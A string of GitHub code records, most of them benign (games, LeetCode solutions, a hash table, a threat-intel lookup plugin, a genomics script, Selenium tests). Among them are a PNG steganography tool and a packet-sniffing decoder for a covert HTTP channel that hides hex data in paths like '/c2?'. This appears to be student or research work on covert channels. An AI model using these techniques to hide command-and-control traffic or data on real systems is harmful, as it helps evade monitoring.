in the image\n for rgb in range(0, 3): # pixel is represented as [int(red),int(green),int(blue)] - iterate over the colors\n if writing_bit_index < len(bits): # performance optimization\n # change the last bit of the color to the bit at writing_bit_index\n pixel_to_update[rgb] = pixel_to_update[rgb] & ~1 | int(bits[writing_bit_index])\n\n writing_bit_index += 1\n else:\n finished_writing = True\n break\n image.putpixel((x, y), tuple(pixel_to_update)) # save the change to the pixel\n if finished_writing:\n break\n if finished_writing:\n break\n\n image.save(args.filename, \"PNG\") # save the image\n\n# show message\nelse:\n bits = \"\"\n for x in range(0, width):\n for y in range(0, height):\n pixel = list(image.getpixel((x, y))) # iterating over the pixels in the image\n for rgb in range(0, 3):\n bits += str(pixel[rgb] & 1) # read the last bit of the colors\n\n # find the end sequence and remove the zero that prevented merging with the previous byte\n bits = bits.split(\"11111111\", 1)[0][:-1]\n\n # convert the string of ones and zeros to bytes\n decode_byte_array = int(bits, 2).to_bytes((len(bits) + 7) // 8, byteorder='big')\n\n print(decode_byte_array.decode(\"utf-8\")) # convert the bytes to string\n","repo_name":"kokolem/pysteganography","sub_path":"steganography.py","file_name":"steganography.py","file_ext":"py","file_size_in_byte":3039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"86763166772","text":"import pygame\n\nclass ScoreBoard:\n \"\"\"Background for ScoreBoard screen.\"\"\"\n\n def __init__(self, MainInstance):\n \"\"\"Basic values and image loading.\"\"\"\n\n # References\n self.screen = MainInstance.screen\n self.settings = MainInstance.settings\n\n # Load the images\n self.zero = pygame.image.load('Images/Numbers/0.png').convert_alpha()\n self.one = pygame.image.load('Images/Numbers/1.png').convert_alpha()\n self.two = pygame.image.load('Images/Numbers/2.png').convert_alpha()\n self.three = pygame.image.load('Images/Numbers/3.png').convert_alpha()\n self.four = pygame.image.load('Images/Numbers/4.png').convert_alpha()\n self.five = pygame.image.load('Images/Numbers/5.png').convert_alpha()\n self.six = pygame.image.load('Images/Numbers/6.png').convert_alpha()\n self.seven = pygame.image.load('Images/Numbers/7.png').convert_alpha()\n self.eight = pygame.image.load('Images/Numbers/8.png').convert_alpha()\n self.nine = pygame.image.load('Images/Numbers/9.png').convert_alpha()\n\n # Values dict\n self.score_dict = {0: self.zero, 1: self.one, 2: self.two, 3: self.three, 4: self.four,\n 5: self.five, 6: self.six, 7: self.seven, 8: self.eight, 9: self.nine}\n self.basic_rect = self.zero.get_rect()\n self.screen_center = self.screen.get_rect().center\n\n # Basic call for default score of 0\n self._determine_score(self.settings.dynamic_score)\n\n\n def _determine_score(self, score):\n # Function to determine the score\n\n # Create a surface\n self.surface = pygame.Surface(((self.basic_rect.width + 5) * len(str(score)), \\\n self.basic_rect.height), pygame.SRCALPHA)\n self.surface_rect = self.surface.get_rect()\n\n # Blit each score number onto surface\n for number, score_val in enumerate(str(score)):\n value = self.score_dict[int(score_val)]\n self.basic_rect.x = ((self.basic_rect.width + 5) * number)\n self.surface.blit(value, self.basic_rect)\n\n # Determine rect of surface\n self.surface_rect.center = self.screen_center\n self.surface_rect.y = self.settings.scoreboard_gap\n\n\n def draw_score(self):\n # Draw the actual scoreboard to game screen\n self._determine_score(self.settings.dynamic_score)\n self.screen.blit(self.surface, self.surface_rect)\n","repo_name":"testing99990011/Flappy_bird_game","sub_path":"Python Files/Flappy_Scoreboard.py","file_name":"Flappy_Scoreboard.py","file_ext":"py","file_size_in_byte":2438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"28271620729","text":"\n\"\"\"\n\nFind the total area covered by two rectilinear rectangles in a 2D plane.\n\nEach rectangle is defined by its bottom left corner and top right corner as shown in the figure.\n\nRectangle Area\nAssume that the total area is never beyond the maximum possible value of int.\n\n\"\"\"\n\n### beat 88%\nclass Solution(object):\n def computeArea(self, A, B, C, D, E, F, G, H):\n \"\"\"\n :type A: int\n :type B: int\n :type C: int\n :type D: int\n :type E: int\n :type F: int\n :type G: int\n :type H: int\n :rtype: int\n \"\"\"\n area1 = (C-A)*(D-B)\n area2 = (H-F)*(G-E)\n side1 = self.computeSide(A, C, E, G)\n side2 = self.computeSide(B, D, F, H)\n return area1+area2-side1*side2\n \n def computeSide(self,a,b,c,d):\n if d < a or c > b:\n return 0\n elif c > a and d <= b:\n return d-c\n elif c <= a and d <= b:\n return d-a\n elif c <= a and d > b:\n return b-a \n else:\n return b-c\n \n\nclass Solution(object):\n def computeArea(self, A, B, C, D, E, F, G, H):\n \"\"\"\n :type A: int\n :type B: int\n :type C: int\n :type D: int\n :type E: int\n :type F: int\n :type G: int\n :type H: int\n :rtype: int\n \"\"\"\n area1 = (C-A)*(D-B)\n area2 = (H-F)*(G-E)\n commonarea = max(0, min(C,G)-max(A,E))*max(0, min(D,H)-max(B,F))\n return area1+area2-commonarea\n \n\n","repo_name":"sharonLuo/LeetCode_py","sub_path":"rectangle-area.py","file_name":"rectangle-area.py","file_ext":"py","file_size_in_byte":1520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"11872759343","text":"import pyshark \nimport os\nimport binascii\nimport sys\ncapture = pyshark.LiveCapture(interface='lo', display_filter='http', only_summaries=False)\nmessage=[]\ncount= 0\ncheck =[]\nstart=False\nfor packet in capture.sniff_continuously():\n #GET /c2?4157 HTTP/1.1\\r\\n\n packet=str(packet)\n try:\n data=packet.split(\"GET \")[1].split(\" \")[0].split(\"/c\")[1].split(\"?\")[0]\n check.append(data) \n if(len(check)==6 and check=='2D2D2D'): \n start=True \n check =[]\n elif(len(check)==6 and check=='2D2E2D'):\n break\n if(start):\n count += 1 \n message.append(data)\n mess=''.join(message)\n if(count==2):\n os.system(\"clear\")\n newmess = binascii.unhexlify(mess).decode()\n print(newmess)\n count = 0\n except:\n continue\ncapture.close()\nexit()\n","repo_name":"McSloats/HTTP_Covert_Channel","sub_path":"CCFinal/src/reader.py","file_name":"reader.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"19564203537","text":"import json\nimport traceback\nimport json\nimport requests\n\nfrom tasks.api_keys import KeyRing\nfrom server.entities.plugin_manager import PluginManager\nfrom server.entities.resource_types import ResourceType\nfrom tasks.tasks import celery_app\nfrom server.entities.plugin_result_types import PluginResultStatus\n\n\n# Which resources are this plugin able to work with\nRESOURCE_TARGET = [ResourceType.IPv4, ResourceType.DOMAIN]\n\n# Plugin Metadata {a description, if target is actively reached and name}\nPLUGIN_AUTOSTART = False\nPLUGIN_DESCRIPTION = (\n \"Lookup onyphe.io wether this IP or Domain is included in threatlists\"\n)\nPLUGIN_IS_ACTIVE = False\nPLUGIN_DISABLE = False\nPLUGIN_NAME = \"onyphe\"\nPLUGIN_NEEDS_API_KEY = True\n\nAPI_KEY = KeyRing().get(\"onyphe\")\nAPI_KEY_IN_DDBB = bool(API_KEY)\nAPI_KEY_DOC = \"https://www.onyphe.io/documentation/api\"\nAPI_KEY_NAMES = [\"onyphe\"]\n\n\nclass Plugin:\n def __init__(self, resource, project_id):\n self.project_id = project_id\n self.resource = resource\n\n def do(self):\n resource_type = self.resource.get_type()\n\n try:\n to_task = {\n \"resource\": self.resource.get_data()[\"canonical_name\"],\n \"resource_id\": self.resource.get_id_as_string(),\n \"project_id\": self.project_id,\n \"resource_type\": resource_type.value,\n \"plugin_name\": PLUGIN_NAME,\n }\n onyphe.delay(**to_task)\n\n except Exception as e:\n tb1 = traceback.TracebackException.from_exception(e)\n print(\"\".join(tb1.format()))\n\n\n@celery_app.task\ndef onyphe(plugin_name, project_id, resource_id, resource_type, resource):\n result_status = PluginResultStatus.STARTED\n query_result = None\n\n try:\n API_KEY = KeyRing().get(\"onyphe\")\n if not API_KEY:\n print(\"No API key...!\")\n result_status = PluginResultStatus.NO_API_KEY\n\n else:\n url = \"\"\n headers = {\n \"Authorization\": f\"apikey {API_KEY}\",\n \"Content-Type\": \"application/json\",\n }\n\n if resource_type == \"domain\":\n url = f\"https://www.onyphe.io/api/v2/summary/domain/{resource}\"\n elif resource_type == \"ip\":\n url = f\"https://www.onyphe.io/api/v2/summary/ip/{resource}\"\n\n query_result = requests.get(url, headers=headers)\n\n if query_result.status_code == 200:\n json_results = query_result.json()\n\n if json_results[\"results\"] == []:\n result_status = PluginResultStatus.RETURN_NONE\n else:\n query_result = json_results[\"results\"]\n result_status = PluginResultStatus.COMPLETED\n\n else:\n result_status = PluginResultStatus.FAILED\n\n PluginManager.set_plugin_results(\n resource_id, plugin_name, project_id, query_result, result_status\n )\n\n except Exception as e:\n tb1 = traceback.TracebackException.from_exception(e)\n print(\"\".join(tb1.format()))\n","repo_name":"ElevenPaths/thethe_server","sub_path":"server/plugins/onyphe.py","file_name":"onyphe.py","file_ext":"py","file_size_in_byte":3093,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"22"} +{"seq_id":"34356537919","text":"# Syed Khurshid, SID:010081191\n\n\n# Creating a HashTable class using chaining\n# -> O(N)\nclass HashingData:\n # Constructor with optional initial capacity parameter\n # Buckets are assigned to an empty list -> O(N)\n def __init__(self, initial_capacity=10):\n self.data = []\n for _ in range(initial_capacity):\n self.data.append([])\n\n # Generating hash-key which is a O(1)\n def hash_key_generator(self, key):\n return hash(key) % len(self.data)\n\n # Inserting a new item into the hash table -> O(N)\n def insert(self, key, item):\n Hkey = self.hash_key_generator(key)\n # First to check if the Hash Key does exist of not\n if self.data[Hkey] == None:\n self.data[Hkey] = [key, item]\n return True # End the function to continue to add more later\n else:\n for keyValue in self.data[Hkey]:\n if keyValue[0] == key:\n keyValue[1] = item\n return True\n\n self.data[Hkey].append([key, item])\n return True\n\n # Searching for an item with matching key in the hash table\n # Returns the item if not found, or None if not found -> O(N)\n def search(self, key):\n # get the bucket list where the key is located\n Hkey = self.hash_key_generator(key)\n # In case the key doesn't exist\n if self.data[Hkey] != None:\n for items in self.data[Hkey]:\n if items[0] == key:\n return items[1]\n return None\n\n # Removes an item with matching key from hash table. -> O(N)\n def delete(self, key):\n Hkey = self.hash_key_generator(key)\n bucket_list = self.data[Hkey]\n if self.data[Hkey] == None:\n return False\n else:\n for keyValue in bucket_list:\n if keyValue[0] == key:\n bucket_list.remove(keyValue[0], keyValue[1])\n return True\n return False\n\n # To Update the item in a key -> O(N)\n def update(self, key, value):\n Hkey = self.hash_key_generator(key)\n # Now to search for hashed line item if its been found or not\n if self.data[Hkey] != None:\n # Now if they match then we update the second list in the data\n for items in self.data[Hkey]:\n if items[0] == key:\n items[1] = value\n return True # This should stop any further updates\n # In case the key doesn't match\n return None\n\n # This is to get the self table -> O(1)\n def get_hash_Table(self):\n return self.data\n","repo_name":"kurogosane1/WGU_C950-Version2-","sub_path":"hashingData.py","file_name":"hashingData.py","file_ext":"py","file_size_in_byte":2643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"9361232597","text":"# импорт модели объекта\r\nfrom gameobject import GameObject\r\n\r\n# импорт дополнительных объектов\r\nfrom objects import *\r\n\r\n# импорт дополнительных функций\r\nfrom functions import *\r\n\r\n\r\nclass Map:\r\n \"\"\"\r\n Инициализация и логика работы карты уровня.\r\n \"\"\"\r\n\r\n def __init__(self, path: str, name: str, ground_color: str) -> None:\r\n self.map = load_map(path, name) # загрузка карты из текстового фала\r\n self.height, self.width, self.tile_size = 0, 0, 0 # инициализация переменных\r\n self.level = 1 # текущий уровень\r\n\r\n # спрайты\r\n self.crates = crates # ящики\r\n self.install_locations = install_locations # места для установки ящиков\r\n self.blocks = blocks # стены\r\n self.ground = ground # земля\r\n\r\n # группы спрайтов\r\n self.crates_group = pygame.sprite.Group() # ящики\r\n self.install_locations_group = pygame.sprite.Group() # места для установки ящиков\r\n self.blocks_group = pygame.sprite.Group() # стены\r\n self.ground_group = pygame.sprite.Group() # земля\r\n\r\n # соотнесение чисел в текстовом файле карты уровня и объектов в игре\r\n self.number_guide = \\\r\n {1: [self.blocks_group, self.blocks, 'gray', 'block'], # стены: 1-4\r\n 2: [self.blocks_group, self.blocks, 'brown', 'block'],\r\n 3: [self.blocks_group, self.blocks, 'red', 'block'],\r\n 4: [self.blocks_group, self.blocks, 'd_red', 'block'],\r\n\r\n 5: [self.crates_group, self.crates, 'gray', 'crate'], # ящики: 5-14\r\n 6: [self.crates_group, self.crates, 'brown', 'crate'],\r\n 7: [self.crates_group, self.crates, 'red', 'crate'],\r\n 8: [self.crates_group, self.crates, 'blue', 'crate'],\r\n 9: [self.crates_group, self.crates, 'green', 'crate'],\r\n 10: [self.crates_group, self.crates, 'd_gray', 'crate'],\r\n 11: [self.crates_group, self.crates, 'd_brown', 'crate'],\r\n 12: [self.crates_group, self.crates, 'd_red', 'crate'],\r\n 13: [self.crates_group, self.crates, 'd_blue', 'crate'],\r\n 14: [self.crates_group, self.crates, 'd_green', 'crate'],\r\n\r\n 15: [self.install_locations_group, self.install_locations, 'gray', 'install'], # установка ящиков: 15-19\r\n 16: [self.install_locations_group, self.install_locations, 'brown', 'install'],\r\n 17: [self.install_locations_group, self.install_locations, 'red', 'install'],\r\n 18: [self.install_locations_group, self.install_locations, 'blue', 'install'],\r\n 19: [self.install_locations_group, self.install_locations, 'green', 'install']}\r\n\r\n # список размещенных на карте объектов (их классы) кроме земли и мест для установки ящиков\r\n self.objects_list = list()\r\n\r\n # список координат каждого места для установки ящика\r\n self.install_locations_list = list()\r\n\r\n # список уже установленных ящиков\r\n self.installed_crates = list()\r\n\r\n self.update_map(path, name, ground_color)\r\n\r\n # звуки\r\n self.crate_installed_sound = pygame.mixer.Sound(os.path.join('assets/sound', 'installed.wav'))\r\n self.crate_installed_sound.set_volume(0.2)\r\n\r\n def kill_sprites(self) -> None:\r\n \"\"\"\r\n Удалить все спрайты.\r\n \"\"\"\r\n for i in self.crates_group:\r\n i.kill()\r\n for i in self.install_locations_group:\r\n i.kill()\r\n for i in self.blocks_group:\r\n i.kill()\r\n for i in self.ground_group:\r\n i.kill()\r\n\r\n def update_map(self, path: str, name: str, ground_color: str) -> None:\r\n \"\"\"\r\n Обновить карту (перейти на другой уровень).\r\n \"\"\"\r\n self.map = load_map(path, name)\r\n self.level = name.split('.')[0][-1]\r\n self.kill_sprites()\r\n self.objects_list = list()\r\n self.install_locations_list = list()\r\n self.init_map(ground_color)\r\n\r\n def init_map(self, ground_color: str) -> None:\r\n \"\"\"\r\n Инициализировать новую карту: создать все спрайты.\r\n \"\"\"\r\n self.height = len(self.map)\r\n self.width = len(self.map[0])\r\n self.tile_size = 64\r\n\r\n for y in range(self.height):\r\n for x in range(self.width):\r\n if self.map[y][x] != 0:\r\n a = self.number_guide[self.map[y][x]]\r\n if a[3] == 'install':\r\n GameObject(a[0], a[1], a[2], a[3], x, y)\r\n self.install_locations_list.append([(x, y), a[2]])\r\n self.change_map((x, y), 0)\r\n else:\r\n self.objects_list.append(GameObject(a[0], a[1], a[2], a[3], x, y))\r\n GameObject(self.ground_group, self.ground, ground_color, 'ground', x, y)\r\n\r\n def change_map(self, pos: tuple, value: int) -> None:\r\n \"\"\"\r\n Изменение значения в позиции *pos* на *value* в главной переменной класса.\r\n \"\"\"\r\n self.map[pos[1]][pos[0]] = value\r\n\r\n def change_sprite_pos(self, pos1: tuple, pos2: tuple) -> None:\r\n \"\"\"\r\n Изменить позицию у определенного спрайта на карте.\r\n \"\"\"\r\n for i in self.objects_list:\r\n if i.get_pos() == pos1:\r\n i.set_pos(pos2)\r\n\r\n def get_sprite_type(self, pos: tuple) -> str:\r\n \"\"\"\r\n Получить тип спрайта (земля, стена...).\r\n \"\"\"\r\n for i in self.objects_list:\r\n if i.get_pos() == pos:\r\n return i.get_type()\r\n\r\n def check_free(self, x: int, y: int) -> bool:\r\n \"\"\"\r\n Проверяет, свободен ли заданный участок\r\n \"\"\"\r\n if self.map[y][x] == 0:\r\n return True\r\n return False\r\n\r\n def move_crate(self, crate_pos: tuple, x: int, y: int) -> tuple:\r\n \"\"\"\r\n Возв��ащает координаты перемещенного ящика, если возможно совершить это действие.\r\n \"\"\"\r\n if self.get_sprite_type((crate_pos[0], crate_pos[1])) == 'crate':\r\n if self.check_free(crate_pos[0] + x, crate_pos[1] + y):\r\n return crate_pos[0] + x, crate_pos[1] + y\r\n return -1, -1\r\n\r\n def check_installed(self) -> bool:\r\n \"\"\"\r\n Добавляет все ящики, расположенные на правильных местах, в список. Возвращает True, если ВСЕ ящики расположены\r\n на правильных местах.\r\n \"\"\"\r\n a = len(self.installed_crates)\r\n self.installed_crates = list()\r\n for i in self.objects_list:\r\n for j in self.install_locations_list:\r\n if i.get_pos() == j[0] and i.get_color() == j[1]:\r\n self.installed_crates.append(i)\r\n if len(self.installed_crates) > a:\r\n self.crate_installed_sound.play()\r\n if len(self.installed_crates) == len(self.install_locations_list):\r\n return True\r\n return False\r\n","repo_name":"Merlyan0/Sokoban","sub_path":"map.py","file_name":"map.py","file_ext":"py","file_size_in_byte":7829,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"} +{"seq_id":"5903243066","text":"# Keep the header open in the left pane\nimport sublime\nimport sublime_plugin\n\nimport os.path\n\nclass HeaderAssistant(sublime_plugin.WindowCommand):\n def run(self):\n fullname = os.path.basename(self.window.active_view().file_name())\n basename, extension = os.path.splitext(fullname)\n\n # File extension mappings\n mappings = { \".cpp\": \".h\", \".h\": \".cpp\" }\n if extension in mappings:\n search = basename + mappings[extension]\n else:\n search = basename\n\n self.window.run_command(\"show_overlay\", args={\n \"overlay\": \"goto\",\n \"show_files\": True,\n \"text\": search\n })\n","repo_name":"315234/HeaderAssistant","sub_path":"HeaderAssistant.py","file_name":"HeaderAssistant.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"21283619435","text":"import requests\nimport sys\nfrom contextlib import contextmanager\nimport subprocess\nimport io\nfrom functools import wraps\nimport pprint\nimport itertools\nimport xml.etree.ElementTree\n\nimport drawSvg as draw # pip install drawSvg\n\nserver = 'http://rest.ensembl.org'\n\n@contextmanager\ndef get(path, **headers):\n\tr = requests.get(path, headers=headers)\n\tif not r.ok:\n\t\tprint('ensembl API unavailable')\n\t\tr.raise_for_status()\n\tyield r\n\n\n@contextmanager\ndef run(*process, stdin=''):\n\tp = subprocess.run(process, input=stdin, capture_output=True, text=True)\n\tif p.returncode != 0:\n\t\tprint(p.stderr)\n\t\tp.check_returncode()\n\tyield p.stdout\n\n\ndef fasta(taxon, species, chromosome, start, end):\n\twith get(f'{server}/sequence/region/{species}/{chromosome}:{start}..{end}:1?', content_type='text/x-fasta') as r:\n\t\treturn r.text\n\n\ndef fetch_genes(taxon, species, chromosome, start, end):\n\twith get(f'{server}/overlap/region/{species}/{chromosome}:{start}..{end}:1?feature=gene', content_type='application/json') as r:\n\t\treturn r.json()\n\n\ndef fetch_transcript(gene):\n\twith get(f'https://www.uniprot.org/uniprot?query={gene}&format=xml') as r:\n\t\txmlContent = xml.etree.ElementTree.fromstring(r.text)\n\t\treturn xmlContent.findall(\".//*[@type='EnsemblBacteria']/*[@type='protein sequence ID']\")[0].get('value')\n\n\ndef on_adler(command, fasta):\n\twith run('ssh', 'Adler', command, stdin=fasta) as output:\n\t\treturn output\n\n\ndef run_fgs(fasta):\n\treturn on_adler(('/data/felix/FragGeneScanPlusPlus/FGSpp -s stdin -o stdout -w 0 -r \"/data/felix/FragGeneScanPlusPlus/train\" -t \"illumina_10\" -p 16 -c 240 |'\n\t '~/.cargo/bin/umgap prot2kmer2lca -o /data/felix/database/2020-12-02/ninemer.fst |'\n\t \"sed 's/^0$/1/' |\" # no match means root\n\t '~/.cargo/bin/umgap taxonomy -a -H /data/felix/database/2020-12-02/taxons.tsv' # get full taxonomy\n\t ), fasta)\n\n\ndef run_fgsrs(fasta):\n\treturn on_adler(('~/.cargo/bin/FragGeneScanRs -r \"/data/felix/frag_gene_scan_rs/train\" -t \"illumina_10\" |'\n\t '~/.cargo/bin/umgap prot2kmer2lca -o /data/felix/database/2020-12-02/ninemer.fst |'\n\t \"sed 's/^0$/1/' |\" # no match means root\n\t '~/.cargo/bin/umgap taxonomy -a -H /data/felix/database/2020-12-02/taxons.tsv' # get full taxonomy\n\t ), fasta)\n\n\ndef run_6ft(fasta):\n\treturn on_adler(('~/.cargo/bin/umgap translate -a -n |'\n\t '~/.cargo/bin/umgap prot2kmer2lca -o /data/felix/database/2020-12-02/ninemer.fst |'\n\t \"sed 's/^0$/1/' |\" # no match means root\n\t '~/.cargo/bin/umgap taxonomy -a -H /data/felix/database/2020-12-02/taxons.tsv' # get full taxonomy\n\t ), fasta)\n\n\ndef get_lineage(taxon):\n\treturn on_adler('~/.cargo/bin/umgap taxonomy -H -a /data/felix/database/2020-12-02/taxons.tsv',\n\t str(taxon))\n\nclass Marker:\n\n\t__slots__ = [ 'start', 'end', 'frame', 'color', 'opacity' ]\n\n\tdef __init__(self, start, end, frame, color='black', opacity=1):\n\t\tself.start = start\n\t\tself.end = end\n\t\tself.frame = frame\n\t\tself.color = color\n\t\tself.opacity = opacity\n\n\tdef translate(self, y):\n\t\tself.frame += y\n\n\tdef draw(self, d, scale, margin, height_per_frame, frames):\n\t\td.append(draw.Line(\n\t\t\tself.start * scale,\n\t\t\tframes * height_per_frame - self.frame * height_per_frame - height_per_frame / 2,\n\t\t\tself.end * scale,\n\t\t\tframes * height_per_frame - self.frame * height_per_frame - height_per_frame / 2,\n\t\t\tstroke=self.color,\n\t\t\tstroke_width=5,\n\t\t\tstroke_linecap='round',\n\t\t\topacity=self.opacity))\n\n\nclass Strand:\n\n\t__slots__ = [ 'start', 'end', 'frame', 'text' ]\n\n\tdef __init__(self, start, end, frame):\n\t\tself.start = start\n\t\tself.end = end\n\t\tself.frame = frame\n\t\tself.text = ['1', '2', '3', '-1', '-2', '-3'][frame]\n\n\tdef translate(self, y):\n\t\tself.frame += y\n\n\tdef draw(self, d, scale, margin, height_per_frame, frames):\n\t\td.append(draw.Line(\n\t\t\tself.start * scale,\n\t\t\tframes * height_per_frame - self.frame * height_per_frame - height_per_frame / 2,\n\t\t\tself.end * scale,\n\t\t\tframes * height_per_frame - self.frame * height_per_frame - height_per_frame / 2,\n\t\t\tstroke='#000000',\n\t\t\t#stroke_width=1,\n\t\t\tstroke_linecap='round'))\n\t\td.append(draw.Text(self.text, 10,\n\t\t\t-4,\n\t\t\t(frames - self.frame - 1/2) * height_per_frame,\n\t\t\ttext_anchor='end',\n\t\t\talignment_baseline='middle'))\n\n\nclass Annotation:\n\n\t__slots__ = [ 'start', 'end', 'text', 'frame', 'color' ]\n\n\tdef __init__(self, start, end, text, frame, color='000000'):\n\t\tself.start = start\n\t\tself.end = end\n\t\tself.text = text\n\t\tself.frame = frame\n\t\tself.color = color\n\n\tdef translate(self, y):\n\t\t# self.frame += y # annotation on gene\n\t\tpass # annotation on top\n\n\tdef draw(self, d, scale, margin, height_per_frame, frames):\n\t\td.append(draw.Text(self.text, 14, \n\t\t (self.start + self.end) / 2 * scale,\n\t\t # (frames - self.frame - 1/2) * height_per_frame, # annotation on gene\n\t\t (frames - 1) * height_per_frame, # annotation on top\n\t\t text_anchor='middle',\n\t\t alignment_baseline='middle'))\n\n\ndef strip_lineage(lineage):\n\treturn '\\t'.join(lineage.strip().rstrip('\\t').split('\\t')[3:])\n\n\ndef translate(y, markers):\n\tfor marker in markers:\n\t\tmarker.translate(y)\n\t\tyield marker\n\n\ndef parse_6ft(width, reflineage, sixft):\n\tframe = -1\n\toffsets = [0, 1, 3, 0, 1, 2]\n\tforward = [True] * 3 + [False] * 3\n\tfor line in sixft.split('\\n'):\n\t\tif line.startswith('>'):\n\t\t\tframe += 1\n\t\t\tyield Strand(0, width, frame)\n\t\t\tstart = 0\n\t\telse:\n\t\t\tcurlineage = strip_lineage(line)\n\t\t\tcolor = '#2e7d32' if reflineage.startswith(curlineage) else '#f44336'\n\t\t\topacity = sum(c == '\\t' for c in curlineage) / 60\n\t\t\tgenestart = 3 * start + offsets[frame] if forward[frame] else width - 3 * start + offsets[frame] - 9*3 - 3\n\t\t\tyield Marker(genestart, genestart + 3, frame, color=color, opacity=opacity)\n\t\t\tstart += 1\n\n\ndef parse_fgs(width, reflineage, fgs):\n\tfor frame in range(6):\n\t\tyield Strand(0, width, frame)\n\tfor line in fgs.split('\\n'):\n\t\tif line.startswith('>'):\n\t\t\t*_, start, end, strand = line.strip().split('_')\n\t\t\tstart, end, strand = int(start) - 1, int(end), strand == '+'\n\t\t\tframe = toframe(strand, start, end - 1, width)\n\t\t\tyield Marker(start, end, frame, color='#1565c0')\n\t\t\toffset = 0\n\t\telse:\n\t\t\tcurlineage = strip_lineage(line)\n\t\t\tcolor = '#2e7d32' if reflineage.startswith(curlineage) else '#f44336'\n\t\t\topacity = sum(c == '\\t' for c in curlineage) / 60\n\t\t\tgenestart = start + offset if strand else end - offset - 9*3 - 5\n\t\t\tyield Marker(genestart, genestart + 3, frame + 0.5, color=color, opacity=opacity)\n\t\t\toffset += 3\n\n\ndef parse_genes(start, width, genes):\n\tfor frame in range(6):\n\t\tyield Strand(0, width, frame)\n\tfor gene in genes:\n\t\tframe = toframe(gene['strand'] > 0, gene['start'] - start, gene['end'] - start, width)\n\t\tyield Marker(max(gene['start'] - start, 0),\n\t\t min(gene['end'] - start, width),\n\t\t frame,\n\t\t color='#ff8f00')\n\t\tname = gene.get('transcript', gene['id'])\n\t\tyield Annotation(max(gene['start'] - start, 0),\n\t\t min(gene['end'] - start, width),\n\t\t name,\n\t\t frame,\n\t\t color='#ff8f00')\n\n\ndef toframe(f, s, e, width):\n\tif f:\n\t\treturn s % 3\n\telse:\n\t\treturn 3 + (width - e) % 3\n\n\ndef main(imgfile, taxon, species, chromosome, start, end):\n\twidth = end - start\n\tread = fasta(taxon, species, chromosome, start, end)\n\tlineage = strip_lineage(get_lineage(taxon))\n\tgenes = fetch_genes(taxon, species, chromosome, start, end)\n\tfor gene in genes:\n\t\tgene['transcript'] = fetch_transcript(gene['id'])\n\tgene_markers = translate(2, parse_genes(start, width, genes))\n\tfgs_markers = translate(11, parse_fgs(width, lineage, run_fgs(read)))\n\tfgsrs_markers = translate(20, parse_fgs(width, lineage, run_fgsrs(read)))\n\tft6_markers = translate(29, parse_6ft(width, lineage, run_6ft(read)))\n\n\tmargin = 20\n\theight_per_frame = 10\n\tframes = 36\n\ttargetwidth = 700\n\td = draw.Drawing(targetwidth + 2 * margin, margin + frames * height_per_frame, origin=(-margin, -margin))\n\tfor element in itertools.chain(gene_markers, ft6_markers, fgs_markers, fgsrs_markers):\n\t\telement.draw(d, targetwidth / width, margin, height_per_frame, frames)\n\n\tdef title(s, h):\n\t\td.append(draw.Text(s, 14, 0, (frames - h) * height_per_frame, alignment_baseline='middle'))\n\ttitle('RefSeq', 1.5)\n\ttitle('FGS++', 10.5)\n\ttitle('FGSrs', 19.5)\n\ttitle('six-frame translation', 28.5)\n\n\td.saveSvg(imgfile)\n\n\nA0A009H596 = ('image.png', 470, 'Acinetobacter_baumannii_118362_gca_000580515', 'ab118362.contig.17_1', 53253, 55397)\ninteresting = ('image.svg', 470, 'Acinetobacter_baumannii_118362_gca_000580515', 'ab118362.contig.8_1', 38308, 40888)\nother = ('image.png', 470, 'Acinetobacter_baumannii_118362_gca_000580515', 'ab118362.contig.8_1', 23000, 26000)\nchosen = ('final-raw.svg', 470, 'Acinetobacter_baumannii_118362_gca_000580515', 'ab118362.contig.8_1', 37700, 39530)\nexperiment_fgs = ('fgsfgs.svg', 470, 'Acinetobacter_baumannii_118362_gca_000580515', 'ab118362.contig.8_1', 37700, 39530)\nexperiment_rs = ('fgsrs.svg', 470, 'Acinetobacter_baumannii_118362_gca_000580515', 'ab118362.contig.8_1', 37700, 39530)\n","repo_name":"ninewise/dissertation","sub_path":"umgap/figures/6ft-figure/fetch.py","file_name":"fetch.py","file_ext":"py","file_size_in_byte":9073,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"21052405776","text":"'''\nCreated on Aug 14, 2018\n\n@author: Daryoush\n'''\n\nfrom CasinoAuto.Locators.UIMapCasinoPage import CasinoPageMapXpath\nfrom CasinoAuto.Locators.UIMapCasinoPage import SearchResult\nfrom CasinoAuto.Locators.UIMapCasinoPage import LogInPageMap\nfrom CasinoAuto.Constants import Casino_Constants\nfrom MatchBookLoginPage import MatchBookLoginPage\nfrom BasePage import BasePage\nfrom CasinoAuto.Locators.UIMapHomePage import HomePageMapXpath\nimport time\nclass CasinoPage(BasePage):\n def __init__(self, driver):\n super(CasinoPage, self).__init__(driver)\n #self.nhl = self.driver.find_element(CasinoPageMapXpath[\"lhncasinoLocatorXpath\"])\n #self.nhl.click()\n #self.driver.navigate_to_page(\"https://dev06.xcl.ie/casino\")\n \n#defining the casino page object here\n def _verify_page(self):\n try:\n \n self.wait_for_element_visibility(10,\"cssSelector\",CasinoPageMapXpath[\"newgameLocator\"] )\n except: \n raise Exception(\"newgameLocator is not accessable\")\n try:\n \n self.wait_for_element_visibility(10,\"cssSelector\",CasinoPageMapXpath[\"popularLocator\"] )\n except: \n raise Exception(\"popularLocator is not accessable\")\n try:\n \n self.wait_for_element_visibility(10,\"cssSelector\",CasinoPageMapXpath[\"jackpotsLcoator\"] )\n except: \n raise Exception(\"jackpotsLcoator is not accessable\")\n try:\n \n self.wait_for_element_visibility(10,\"cssSelector\",CasinoPageMapXpath[\"slotgameLcoator\"] )\n except: \n raise Exception(\"slotgame is not accessable\")\n\n try:\n \n 